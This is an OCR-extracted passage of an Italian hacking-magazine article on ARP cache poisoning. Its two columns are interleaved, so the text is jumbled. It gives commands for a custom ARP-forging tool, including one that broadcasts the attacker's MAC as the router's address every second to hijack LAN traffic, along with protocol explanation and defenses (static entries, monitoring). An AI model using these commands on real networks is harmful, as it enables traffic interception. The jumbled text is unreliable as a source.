# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 Al contrario, si possono benissimo broadcastare pacchetti che
00:10:40:30:20:11 192.168.1.2 00:00:00:00:00:00 aggiornano la cache e creare entry in essa (quest’ultimo deve
192.168.1.8 10000000 contenere il dst ip corretto, quindi non possiamo broadcastare
DELAY = 10000000 quando creiamo entry). Per broadcast intendo che con un pac-
SENT chetto un attacker può passare indisturbato.
# Modificando la tabella di ARP un attaccante potrebbe ridirige-
re tutto il traffico della rete sulla propria macchina, catturarlo,
ora vediamo la cache di DigitalF... e poi inviarlo eventualmente alla vera destinazione.
Supponiamo di avere due computer di una LAN, A e B, che
root@DigitalF:~# arp -na hanno in cache il MAC address del router. Se questo viene mo-
(192.168.1.2) at 00:10:40:30:20:11 [ether] on eth0 dificato, inserendo abusivamente il MAC address del computer
(192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0 C al suo posto, tutto il traffico destinato al router (tutto il traf-
root@DigitalF:~# fico Internet in pratica) verrà dirottato su C.
Che potrà a sua volta dirigerlo sul router o fare esso stesso da
Abbiamo nuovamente cambiato la cache per 192.168.1.2. router, avendo però la possibilità di intercettare le comunica-
Ma perché? guardiamo il protocollo... Gli arp request con- zioni e alterare ogni pacchetto.
tengono il source ip e source mac di un host e il dst ip a cui
viene inviata la richiesta. Perché non memorizzare in cache il
source e dest mac dei request che riceviamo? Questo permet-
terà di evitare di mandare un request per quel IP nel futuro.
Infatti, questa procedura fa parte del protocollo. Un attacker Per saperne di più
potrebbe inserire informazioni false per memorizzare in cache
ciò che più gli pare. Si noti come anche in questo caso il dst lteriori informa-
ip non viene controllato, e il pacchetto è broadcast.

>> Possibili attacchi U zioni tecniche sull’Address Resolution


Protocol possono essere trovate nelle RFC
826 e 903, che si possono trovare un po’ ovun-
que su Internet, per esempio su
Proviamo a mandare un request con un source ip che non sta
www.faqs.org/rfcs/rfc826.html e
già nella table (quindi effetivamente cerchiamo di creare un
entry nell’arp table). www.faqs.org/rfcs/rfc903.html rispettivamente.
Purtroppo non sono state ancora tradotte in ita-
# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 liano.
00:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00

30 | www.hackerjournal.it
28_31ARP_spoofing 21-08-2002 17:31 Pagina 31

>>
Dirottamento di una connessione viene aggiornata a ogni secondo, A e B non invieranno mai le
con spoofing delle tabelle ARP richieste ARP. Utilizzando request invece che reply, l’attacker pas-
serà probabilmente inosservato, non essendoci tracce evidenti di
Traffico normale un attacco.

>> Come difendersi


A
Tutto questo funziona solo all’interno di una LAN, ma è un attac-
co molto efficace e da non sottovalutare. Tutti i computer della
LAN sono vulnerabili a questo tipo di attacchi. Per di più, l’at-
tacco può essere portato anche da remoto se l’attacker en-
tra nella LAN attraverso un tunnel VPN. Una prima con-
tromisura di difesa è quella di impostare le entry ARP
come statiche. La seconda è di monitorare gli ARP, per
esempio implementando controlli ai dst IP. Ciò vuol dire
Router che per ogni host della LAN che l’attacker vuole dirotta-
re dovrà inviare un arp. Quindi se invia pacchetti a inter-
valli di un secondo, per 100 host dovrà inviare 100 pac-
Internet chetti ARP al secondo invece che 1. e quindi l’attacco dovreb-
be essere più evidente. K

B
Traffico dopo aver modificato la cache di ARP impo-
stando il MAC Address di C sull’IP del router.

C
Router

Internet

B
in pratica:

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 MACNO-


STRO IPROUTER 00:00:00:00:00:00 1.1.1.1 1000000

Con questo pacchetto la cache di tutta la LAN si aggiornerà. Pro-


babilmente, l’attaccante invierà il pacchetto molto frequentemen-
te, magari a ogni secondo, tanto per essere sicuro che il router
non mandi reply corretti o modifichi la cache. Siccome la cache

www.hackerjournal.it | 31

Potrebbero piacerti anche